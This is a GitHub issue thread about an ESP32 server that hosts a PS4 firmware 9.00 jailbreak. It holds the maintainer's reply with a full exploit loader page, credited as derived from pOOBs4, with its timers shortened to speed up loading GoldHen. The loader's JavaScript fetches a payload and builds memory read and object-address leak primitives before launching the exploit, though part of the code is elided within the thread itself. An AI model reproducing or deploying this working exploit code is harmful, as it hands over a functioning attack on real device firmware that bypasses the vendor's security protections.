stooged/ESP32-Server-900u #83: Binary with speed GoldHen method

vovagorodok, 2022-11-29:
What about speed method like:
https://youtu.be/tapxVpi-ke4?t=611

Runs GoldHen immediately without clicking a button

stooged, 2022-11-29:
if you want to run hen without clicking a button then modify this [line](https://github.com/stooged/ESP32-Server-900u/blob/main/ESP32_Server_900u/ESP32_Server_900u.ino#L38) to "true"

```
#define AUTOHEN false  
```

if you had to run goldhen before every game i could see the point of speeding it up but you run goldhen 1 time per console boot so it is really creating a solution to a problem that does not exist.

if you really want to add that then you modify the loader code and lower the wait timers and also lower the usbwait time. 
the wait timers i put in place to slow it all down because i found better success on my consoles with it waiting more than speeding it up.

here is an example of the loader with the timers reduced

lines modified 
```
usbWaitTime = 1000;

setTimeout(poc, 500);
```

full loader code
```

<!DOCTYPE html><html>
<head>
<title>Loader</title>
<meta name=viewport content="width=device-width, initial-scale=1">
<style>body{color:white;font-size:20px;text-align:center;margin:0;overflow:hidden;}.info{overflow: hidden;position: fixed;position: absolute;top: 45%;left: 50%;font-size: 25px;font-family: sans-serif;color: #b8b8b8;transform: translate(-50%, -50%);}</style>
<script>

// original exploit: https://github.com/ChendoChap/pOOBs4

var payloadFile = sessionStorage.getItem('payload');
var payloadTitle = sessionStorage.getItem('title');
var usbWaitTime = sessionStorage.getItem('waittime');
var payloadData = "";

usbWaitTime = 1000;

function showMessage(msg) {
  document.getElementById("message").innerHTML = msg;
  document.getElementById("message").style.display='block';
}

function loadPayloadData() // preload payload data
{
  if (payloadFile)
  {
        var xhr = new XMLHttpRequest();
        xhr.open('GET', payloadFile, true);
        xhr.overrideMimeType('text/plain; charset=x-user-defined');
        xhr.onload = function(e) {
        if (this.status == 200) {
            payloadData = this.response;
        }
        else
        {
            showMessage("Failed to load " + payloadFile + " - " + this.status);
        }};
        xhr.send();
  }
  else
  {
     showMessage("No payload set.");
  }
}

// usb functions - stooged
function disableUSB() {
  var getpl = new XMLHttpRequest();
[... 1407 lines cut ...]
            expl_master[4] = addr.low;
            expl_master[5] = addr.hi;
            return expl_slave[0] & 0xFFFF;
        },
        read1: function (addr) {
            expl_master[4] = addr.low;
            expl_master[5] = addr.hi;
            return expl_slave[0] & 0xFF;
        },
        leakval: function (obj) {
            obj_slave.obj = obj;
            return new int64(obj_master[4], obj_master[5]);
        }
    };
    window.p = prim;
    run_hax();
}
</script>
</head>
<body onload="setTimeout(poc, 500);">
<div class="info" id="message">Loading Exploit, Please Wait ...</div>
</body>
</html>

```

closed 2022-11-29 by stooged

eemcm2, 2022-11-30:
man just install kameleon leeful 9v5 server